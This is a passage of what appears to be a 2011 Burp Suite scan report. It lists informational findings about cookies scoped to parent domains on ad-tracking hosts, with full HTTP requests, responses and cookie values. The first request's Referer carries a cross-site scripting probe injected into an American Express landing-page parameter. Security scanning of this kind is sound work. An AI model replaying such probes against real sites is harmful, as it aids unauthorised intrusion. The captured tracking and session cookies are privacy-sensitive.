User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1a69c8%22-alert(document.location)-%2236ea2529e7b&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g
Cookie: fsserver__SESSION__=t-1201.estara.com; fs_nocache_guid=897661DA01AED5466FF67DD4FD9B666D; fscookies=b64_Tcs5DoAwDETR29CBbCd2nCJnQSCQoCAgCPenYPN0X09DAAhCKt5xQgfqkAh91fVlPAoZbfcuD-lcUogNOAaN7yRUjBhiPc3lSPjEuo35DrWin3hm.uSO-8P2w1bEirxyAQ__

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:03:40 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Pragma: no-cache
Set-Cookie: fscookies=b64_Xc3BDoMwCIDht-G2BWih9NBnWbqtiTvYGa3v70FXybj9.QIQAIKQinec0IE6JEI-5GcrayOjjyXXd92mFOIdHIPG30gYGDHE2-hpa8IzvnOpR6gV7eKZqcsR1w7bHbYiVuTvz5TbayzXwd47; expires=Wed, 15-Jun-2016 12:03:40 GMT; path=/; domain=.estara.com
Content-Length: 8
Content-Type: text/html; charset=UTF-8

if(0){}

9.3. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 16-Jun-2013 11:59:07 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2101&rn=275967894&c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Fblogs.creditcards.com%252F%26r%3Dhttp%253A%252F%252Fwww.creditcards.com%252Fpoints-rewards.php&c3=1234567891234567891&c9=http%3A%2F%2Fblogs.creditcards.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://dg.specificclick.net/?y=3&t=h&u=http%3A%2F%2Fblogs.creditcards.com%2F&r=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 17 Jun 2011 11:59:07 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 16-Jun-2013 11:59:07 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

9.4. http://cf.addthis.com/red/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308311946.1FE|1308311946.60|1308311946.1EY|1308225884.19F|1308225884.1VV|1306359996.1OD; Domain=.addthis.com; Expires=Sun, 16-Jun-2013 11:59:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=2&gen=1000&gen=100&sid=4dfb41a21066432c&callback=_ate.ad.hrr&pub=creditcards.com&uid=4dce8a530508b02d&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&ref=http%3A%2F%2Fblogs.creditcards.com%2F&1x7h47n HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; psc=0; dt=X; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308311946.1FE|1306359996.1OD|1308225884.19F|1308311946.60|1308225884.1VV|1308311946.1EY; uid=4dce8a530508b02d; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Fri, 17 Jun 2011 11:59:35 GMT
Set-Cookie: di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308311946.1FE|1308311946.60|1308311946.1EY|1308225884.19F|1308225884.1VV|1306359996.1OD; Domain=.addthis.com; Expires=Sun, 16-Jun-2013 11:59:35 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 17-Jul-2011 11:59:35 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Fri, 17 Jun 2011 11:59:35 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

9.5. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 11:59:56 GMT; Path=/
lsn_qstring=EhraRx8K%2FBE%3A224261%3A1124cf812011e906cc17069a599054; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 11:59:56 GMT; Path=/
lsn_track=UmFuZG9tSVYRizqjZXnGQxDToyno5A9RBlx%2Fm1pnukrSaDAZFqlMAg5QwCbNuuMthrS4noYNoIWwbsKdQsozzg%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 11:59:56 GMT; Path=/
lsclick_mid1335="2011-06-17 11:59:56.312|EhraRx8K%2FBE-BQHxeK4lVk5JnoYun3f8jw"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 11:59:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs-bin/click?id=EhraRx8K/BE&offerid=214035.10002088&type=3&subid=0&u1=1124cf812011e906cc17069a599054 HTTP/1.1
Host: click.linksynergy.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22034407&pg=17&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; lsn_qstring=EhraRx8K%2FBE%3A227478%3A1120e8cd201180061c17060a514329; lsn_track=UmFuZG9tSVZTGei6OP%2B7uQzzprzIV6pvp2RqaKp7Pb5IaO9VwdRdPkp1DAnI1Qzrj8wqGV%2FSx%2FwxjPyvCsywig%3D%3D; lsclick_mid2291="2011-06-17 11:51:31.045|EhraRx8K_BE-PWS2r5T7Tzgjw3IqElyKzA"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 11:59:56 GMT; Path=/
Set-Cookie: lsn_qstring=EhraRx8K%2FBE%3A224261%3A1124cf812011e906cc17069a599054; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 11:59:56 GMT; Path=/
Set-Cookie: lsn_track=UmFuZG9tSVYRizqjZXnGQxDToyno5A9RBlx%2Fm1pnukrSaDAZFqlMAg5QwCbNuuMthrS4noYNoIWwbsKdQsozzg%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 11:59:56 GMT; Path=/
Set-Cookie: lsclick_mid1335="2011-06-17 11:59:56.312|EhraRx8K%2FBE-BQHxeK4lVk5JnoYun3f8jw"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 11:59:56 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Fri, 17 Jun 2011 11:59:55 GMT
Cache-Control: no-cache
Pragma: no-cache
Location: http://www201.americanexpress.com/sbsapp/FMACServlet?request_type=GoldSCLP&openeep=42732&PID=1&BUID=SBS&PSKU=BGR&CRTV=SCLPBGR&EAID=EhraRx8K%2FBE-BQHxeK4lVk5JnoYun3f8jw
Content-Length: 0
Connection: close

9.6. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 12:00:31 GMT; Path=/
lsn_qstring=EhraRx8K%2FBE%3A227478%3A1118b79220110c061317070b00ed04; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 12:00:31 GMT; Path=/
lsn_track=UmFuZG9tSVYkVQ7zZ50sMP6zzgyOXYFH4NxsDcK9L89L9V6GAZUtq7w%2Fv0c5e2Gg3c6Q8Ny5aiajimfEubz9lw%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 12:00:31 GMT; Path=/
lsclick_mid2291="2011-06-17 12:00:31.668|EhraRx8K_BE-Gq0WXXscoeFiJWMkyMbiLA"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 12:00:31 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs-bin/click?id=EhraRx8K/BE&offerid=227478.10001588&type=3&subid=0&u1=1118b79220110c061317070b00ed04 HTTP/1.1
Host: click.linksynergy.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125109&pg=17&pgpos=9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsclick_mid2291="2011-06-17 11:51:31.045|EhraRx8K_BE-PWS2r5T7Tzgjw3IqElyKzA"; lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; lsn_qstring=EhraRx8K%2FBE%3A224261%3A111326932011e70624170645597158; lsn_track=UmFuZG9tSVYYZ0JtvqPgV98x%2BGpPYmQf2xmZZhO0VWwmLHYAs1CSN681TgW7DEgO3okZTia6ZR29J%2FWPISuigg%3D%3D; lsclick_mid1335="2011-06-17 11:59:59.712|EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 12:00:31 GMT; Path=/
Set-Cookie: lsn_qstring=EhraRx8K%2FBE%3A227478%3A1118b79220110c061317070b00ed04; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 12:00:31 GMT; Path=/
Set-Cookie: lsn_track=UmFuZG9tSVYkVQ7zZ50sMP6zzgyOXYFH4NxsDcK9L89L9V6GAZUtq7w%2Fv0c5e2Gg3c6Q8Ny5aiajimfEubz9lw%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 12:00:31 GMT; Path=/
Set-Cookie: lsclick_mid2291="2011-06-17 12:00:31.668|EhraRx8K_BE-Gq0WXXscoeFiJWMkyMbiLA"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 12:00:31 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Fri, 17 Jun 2011 12:00:30 GMT
Cache-Control: no-cache
Pragma: no-cache
Location: https://applynow.chase.com/FlexAppWeb/renderApp.do?SPID=DF92&CELL=6H8X&AFFID=EhraRx8K_BE-Gq0WXXscoeFiJWMkyMbiLA&pvid=1118b79220110c061317070b00ed04
Content-Length: 0
Connection: close

9.7. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

33x_ps=u%3D7836807683%3As1%3D1305398110461%3Ats%3D1308311947421%3As2.33%3D%2C6940%2C; Domain=.33across.com; Expires=Sat, 16-Jun-2012 11:59:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dce8a530508b02d HTTP/1.1
Host: pixel.33across.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 33x_ps=u%3D7836807683%3As1%3D1305398110461%3Ats%3D1308181160375%3As2.33%3D%2C6940%2C

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7836807683%3As1%3D1305398110461%3Ats%3D1308311947421%3As2.33%3D%2C6940%2C; Domain=.33across.com; Expires=Sat, 16-Jun-2012 11:59:07 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Fri, 17 Jun 2011 11:59:07 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

9.8. http://sales.liveperson.net/hc/32528459/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/32528459/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-16101514677756-1308311975:-1:-1:-1:-1; expires=Sat, 16-Jun-2012 11:59:49 GMT; path=/hc/32528459; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/32528459/?&site=32528459&cmd=mTagInPage&lpCallId=126605105586-572009782772&protV=20&lpjson=1&page=http%3A//www.capitalone.com/smallbusiness/cards/venture-for-business/%3FProductCode%3DSB5%26external_id%3DGAN_1000002114_SBCGAN_j31125666k112308_631528251&id=7998289160&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sb-sales-english&activePlugin=none&cobrowse=true&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_631528251
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6682965583658191868; LivePersonID=-16101514677756-1308311975:-1:-1:-1:-1; HumanClickSiteContainerID_32528459=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDAQSCRRRS=PBNCLIECMNLIHJBBIOIPPANI; HumanClickACTIVE=1308311973932

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_32528459=STANDALONE; path=/hc/32528459
Set-Cookie: LivePersonID=-16101514677756-1308311975:-1:-1:-1:-1; expires=Sat, 16-Jun-2012 11:59:49 GMT; path=/hc/32528459; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 17 Jun 2011 11:59:49 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 188

lpConnLib.Process({"ResultSet": {"lpCallId":"126605105586-572009782772","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

9.9. http://tags.bluekai.com/site/2750 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2750

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=gUoquR7lj5Zd8JkA; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
bkc=KJh5Naa/DtWDOdedqPFmkjBYYo31/emZ+QGCuYsH7QptmBZexyhEiUhDJ96PbzDxVosYuetWFQiZfvAKOGN9KryoYFJaWTDCpkYZGIizKdKNKXfefFMh7UmIzIf2fL6W9cXVKB+HMJ6YAYswJSVfFsVw7QcI7gSycils9Ci6lEX1TRSq6Cckoo96Nl4q9IZNoX9JtRwc+o5YpFTKJs6Fvr5c/Jhf/Otb3BqcSSftRLy3pHKk4+INXqyP3YjFcysoBZK54q2jZFLl8Fy625BhydsTe0QA3WS6fsbF5J4n24ufudmKlpZmHHelLELejjXWQKHlYpUAEF0yt97km1Vfp4VBrPbXPmXSzFjIFsbXV6UgihRvKXz642MtCtA/zfhhkooI4y7/Agkd2GG0hhLF62foBO9ImvEXEJe5IA0STTldP9ON4zY2C6TIITG0hhFfvwdn1FYPXG6dvTX+ue2u7o0UUoiEl7G+F4NvI340BIUSk2n7kvrDFz3MvKZCsK7Xkwu+sZZIUXSg8wPw21bbwv2XrDbSXT6MjTcoqQr84BAe/KAIjzTlf3cnZI498FbCdUlovj6URlXkLWc7GlcwiV5weA+wvcmIXuh2E/Jqaoo35dXfGcy2nwtqpo4qOXo88uz+67fkyClo4KP4037q6iIDKEfMu7GKcIkXU7Y8563b4DvSdTle2eT7gkgYrU38pFLjdyBzGlah; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
bkst=KJhBAn2gNWWxhqz/snyzWxxqHupuqopj74taCRxAcYjz8/CQDrfm4gIQy3kaevHmgfSoqnxPguVxd9DtRoku6NAJ6zqjLXkVy8Lwfft5m4Uk3oJlIF7fKWT50f0AQitIxWTbKhz6Jj56jYv5QtcsbGph85teFXv4Yc2afDt4EjdFEpILBKk6jCcfTM3qVDKqguqZgswBxR4K5Bxkf0Z0I5xiFNbtInwzncbJ5aNau+8jXeRjjTNpW4prbpBjny8STq4lspGKBBuuOlY9comhAuyipFdX/KFexu+e+D/GccVUx+s/AqV+cK+x/MrVY/Z8mdFdKIaF3+VP2KlNgDzwd5gM0Kgn6Dc54pc3K4H6LbTzpHG1adb7siO6CoyO3VACrL7184jx3xDPUdsEFz7sKs57Rd4sgUwHFTkIHbsJ+GHA9Y6Q91ikvyvnpnTl8/z4ZX48LeVF0Kzx351h9VGv+5moPo7bCJZnHR5WF0IWFl4+6C740slI9VrbKQA=; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2750?id=73b6b0a9-a657-4959-8c44-a72cc1d5226b HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bklc=4dfb282e; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101UbZ22LUv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6BnxhQikZ9iGkHYyYfRHok; bkst=KJhkAnNn96Wxhqz/vYScQZYMi/U+brp7fV/C/xZOuJuQRanKf5bOYksnsnYtPN+fqDPgWzh4RYmVkogmuk9qjt1MrBUyZX5fqb59fiR/FLc+zfB9f7WK/flrU7Kdlft34iBbI/XsiOSJ0PmPizHH/hJOoU1JBEbJSjppEsjVStAzFyZrMlX+FoSYhEriSVvAND39aoRgyjD0Ger7nfiKn/jm8b+Otiys3j9Sx9cEpcJCosY1MqI2TF3As1o/f0am7SsjMPwvZcaDI1pHmePmmRp9ZmUHa02Hw6L385oZqUNgxNKlV8UeIgcFc2HpP225XIVnDRmG2JFvxEnaoKv9BxDRNH38pWKWk/Q8zMr2P3wjqMzb1lBe8Wd/ayMMH3uh8z9W19O//4W1csv7z08N5O6XCkaGf3NmRi1pSiyyvZm4DKL2EgkkiDLaD6pvM6dDg6p2mK1jlrRcEdhp89==; bko=KJ0ETtBQVmc0t8KaRH/q9X10//r4GP9xyZJiSmJQRweDOfWZzLBR0AONhdPIIp/07mSYLUR/xNC1ev3XWJRQQpzFEWy50rJ7iOVWLJQjp7JefsPkYs57RWiPdyD6Hx5G0G2lwTWLwVRsCGr4FFo01M995VQOVRy15TYZb1iXOnG6EQMYRZJ/C/3h1rxeEVaIXH0GnGscQucr0EmQcPoyNiPIY9+GO0I1Jx76IqFQV6OjVu9gRmBNG1A9ZnCccx==; bkw5=KJ0akPN/PaWxhddU3bklgxpXieRi/0NNl5lXxOwDNUYPdz9kYQLi1XtKIGvY0Wnn3OTMz1rc7oqz/cG/x6vAiYJbe/gGNqvcGYQNGi5g8obf7WBfnilLrzF27jApX8IjLI1P9vy6ncg6Rt97RvexZgLBeaqu3T/6U+mMsj5gZRhb4a8QVYWCUcP/5He/38cK2rBExcoq5zi39jEiuaiuK+LIO4TRKBF1S8bNI5Sd8JNYa7N9PtWSCX7q5F03O6y7BCcc3vzZ3BFazEbb8WjZF/RnXjmlhlD0+tbXg8zj+9SWeKFHQV5Bo/1Zs7s0mYUq/7mv77y59I3/UiW0Rx/KNe3WwKLJ7bR7c/sKPn+bXfLupkBwmm3NeVGBEpGN4wA9IBO/gXMsH6oUTUinMmOSA0YLxxmI+XCpqiMWCtIvpu0H1JWlIqxOfqLaXjRekutLbOu3zG9i7/G9rDiSwtCc6Fh+gyV+FBj+1Pe+fmU3kIWzfztCs7KmA62gK9/RSrUpodYEKeWYcUhv6kyS9RTojeNtmVuj09ZagWmUxdM16ygjQ/1mVusq1yGoxq2emmSnYikag61TMfWtGx6EwNRbC9nEPmrcqPnoH7hLkloKeyWMs21R+3FpJuEg2MyAkKfaGD8oX6/CKtaN0Co157mPD8MwR5lvTMnE8V8oAXOXVwqrDaM6m6K2YDddufig2RufVAdXg+TT6N5CzjL2X59ejX1062AK6P1l0VRqO7oAEhU66g5G0Lb6/zJjEI19dPfM2n7GiDCWp7/MXiwbV0ofP0jwwKWX2zEFbGlpc/0vwW1Do/UPivpqxkEzqYU6t/m83npj2LVW+I/5ccLyoLXQKNzZ9plCewEWfI3B1dQEW2wJu7ryWm1NSUbtjpCf7idRv25OpvsRnec7u5BS8cD5gUNhGz+VrgFvWRpnIi5LAgJJnQJvw227RApq1H3RM9FaIJTRbhwHzX2D/JGxdyUz18EeDPbUpFBbp8rjpMrmOD27exRuKGtp5tD6No1jgKK1h7gYs+INuzgr7l/1t5WDVQSwgl/wdQP4QaRq; bk=lOmmHG7lj5Zd8JkA; bkc=KJh5NW2/acWDOdeF8sf3kCrvanu0OvZhoSLHOODA63kQM0+fDvxGWbkMW3bi/kt1GY63WmAu5Ccby8f3WYuO5myDOUUJHsWHN0CVkbnl5F3NXltcZKceKIdllLpXjgJfQeIfwuy70bA/gi1gFMGvX+ar5LvT/XqrefagycTSXdFPRveiOKwiEj9nk2ih9I0UWXOmh54XdWAQtN+mK5JU7jH87duDDf+xilliNP29gLKw30IzRmFXpk34kd7m5dZKe9mkMv0HgcGyhmTwratmLpJ462otvGa6VB6U3UG7YQhXX+9LfLB7E86hEA+I6n3ILbbUdg4KWHx3dEErFBTQXxDwoRN+r42ThS2Zx5jX80DjIFkORWZLXbr4sVrIXbn6prKOIBjw3UXEPjI8h5jX82INxmLxzmbvUbXIqvp8pZso4fX/4JOb8l4sTdwLWKwom4qX/dqv9dq344RUTTdsn44RMzRBhicMq/82Tybfm11IlLpV8IUXxgpXPgfjQmK1efV0+5T8LHKRc4HxvaR2cs1wsVr2X6D8wqTB4BFD2INqTX8N2zOUtHdcBFhX24xGKXoRb8640LXArrvCGtU2F0ws7Ucte2k4xVXjaTlcEgwgMWr7tJFslTNpJ2klM4UI7mFk4q0VdqAdT1LpfBTo+kb5Td/2j2GXz3s5T2gwIu2oeVS9; bkdc=res

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:33:36 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=gUoquR7lj5Zd8JkA; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5Naa/DtWDOdedqPFmkjBYYo31/emZ+QGCuYsH7QptmBZexyhEiUhDJ96PbzDxVosYuetWFQiZfvAKOGN9KryoYFJaWTDCpkYZGIizKdKNKXfefFMh7UmIzIf2fL6W9cXVKB+HMJ6YAYswJSVfFsVw7QcI7gSycils9Ci6lEX1TRSq6Cckoo96Nl4q9IZNoX9JtRwc+o5YpFTKJs6Fvr5c/Jhf/Otb3BqcSSftRLy3pHKk4+INXqyP3YjFcysoBZK54q2jZFLl8Fy625BhydsTe0QA3WS6fsbF5J4n24ufudmKlpZmHHelLELejjXWQKHlYpUAEF0yt97km1Vfp4VBrPbXPmXSzFjIFsbXV6UgihRvKXz642MtCtA/zfhhkooI4y7/Agkd2GG0hhLF62foBO9ImvEXEJe5IA0STTldP9ON4zY2C6TIITG0hhFfvwdn1FYPXG6dvTX+ue2u7o0UUoiEl7G+F4NvI340BIUSk2n7kvrDFz3MvKZCsK7Xkwu+sZZIUXSg8wPw21bbwv2XrDbSXT6MjTcoqQr84BAe/KAIjzTlf3cnZI498FbCdUlovj6URlXkLWc7GlcwiV5weA+wvcmIXuh2E/Jqaoo35dXfGcy2nwtqpo4qOXo88uz+67fkyClo4KP4037q6iIDKEfMu7GKcIkXU7Y8563b4DvSdTle2eT7gkgYrU38pFLjdyBzGlah; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
